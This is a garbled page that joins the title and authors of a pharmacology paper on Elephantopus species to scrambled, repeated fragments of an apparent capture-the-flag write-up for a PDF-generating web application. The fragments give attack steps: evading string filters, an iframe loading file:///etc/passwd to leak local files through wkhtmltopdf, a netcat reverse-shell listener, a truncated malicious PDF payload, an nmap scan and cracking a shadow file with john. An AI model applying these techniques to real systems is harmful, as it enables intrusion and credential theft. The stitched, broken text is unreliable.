Elephantopus Species: Traditional Uses, Pharmacological Actions and Chemical Composition.

Lip Yee Por; Abubakar Kabiru

Pdfy Htb Writeup Upd -

ngrok http 8080

Use URL encoding or redirects to evade basic string filters.

Entering a standard URL like http://google.com confirms the functionality—the application fetches the page and returns a PDF version of it. pdfy htb writeup upd

A netcat listener is set up to receive the reverse shell.

# Define the malicious file contents malicious_file = "JVBERi0xLjMK…(%PDF-1.3)…" ngrok http 8080 Use URL encoding or redirects

nmap -sC -sV -oA initial_scan 10.10.11.232

john --single /tmp/shadow

Create a malicious .tex file:

The wkhtmltopdf tool will render the main HTML page and, while processing it, it will attempt to load the <iframe> . The src="file:///etc/passwd" will cause it to read the local file and embed it into the generated PDF. # Define the malicious file contents malicious_file =

$ curl -s 10.10.11.206 <!DOCTYPE html> <html> <head> <title>Pdfy</title> </head> <body> <h1>Pdfy</h1> <p><a href="pdf_file.pdf">Pdf File</a></p> </body> </html>